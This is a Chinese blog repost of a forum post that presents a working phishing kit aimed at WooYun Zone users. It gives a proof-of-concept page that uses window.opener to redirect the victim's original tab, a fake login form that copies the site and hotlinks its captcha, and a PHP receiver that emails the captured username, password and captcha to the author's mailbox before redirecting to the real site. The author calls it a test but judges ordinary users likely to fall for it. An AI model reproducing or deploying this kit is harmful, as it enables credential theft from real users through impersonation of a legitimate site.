首先请看演示:http://zonewooyun.sinaapp.com/poc/poc.html
帖子链接:http://zone.wooyun.org/content/11465
前几天想到的方法,晚上没事儿做了一个
效果不是很好,大部分小伙伴都不上当。纯属测试 勿喷。
poc.html
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script> parent.window.opener.location="http://zonewooyun.sinaapp.com/login/"; </script> <p>哥们!你还真信啊?</p>
这里实现的是打开链接后原页面跳转了,也就是
http://zone.wooyun.org/content/11465
跳转至钓鱼页面
http://zonewooyun.sinaapp.com/login/
/login/index.php—假的登陆页面
<form id="formLogin" action="login.php" method="post" onsubmit="return Check()"> <table class="formTable"> <tbody> <tr> <th width="100">邮箱:</th> <td><input id="user" name="user" type="text" style="width: 150px" /></td> </tr> <tr> <th>密码:</th> <td><input id="pwd" name="pwd" type="password" style="width: 150px" /></td> </tr> <tr> <th width="100">验证码:</th> <td><input id="captcha" name="captcha" type="text" style="width:85px" maxlength="25" /> <img title="点击刷新验证码" align="top" src="http://zone.wooyun.org/captcha.php?770287" onclick="this.src='http://zone.wooyun.org/captcha.php?'+Math.random()" style="cursor:pointer" /></td> </tr> <tr> <th> </th> <td><input type="submit" class="subbtn" value="登录" /></td>
login.php—-钓鱼接收页面
<meta http-equiv="refresh" content="0.1;url=http://zone.wooyun.org"> <?php $us=$_POST['user']; $pw=$_POST['pwd']; $ca=$_POST['captcha']; $mail = new SaeMail(); $mail->quickSend( "***@126.com" , "test账号密码" , ".$pw..$ca.$us." , "***@126.com" , "密码" ); $mail->clean(); // 重用此对象 $mail->quickSend( "***@126.com" , "test账号密码" , ".$pw..$ca.$us." , "***@126.com" , "密码" , "smtp.126.com" , 25 ); // 指定smtp和端口 ?>
这里接收账号密码,同时跳转至zone首页
个人觉得普通用户上当的可能性还是比较大的,仓促之间做的,不是很完善。
转自:http://lcx.cc/?i=4265
转载请注明:jinglingshu的博客 » 一个钓鱼方法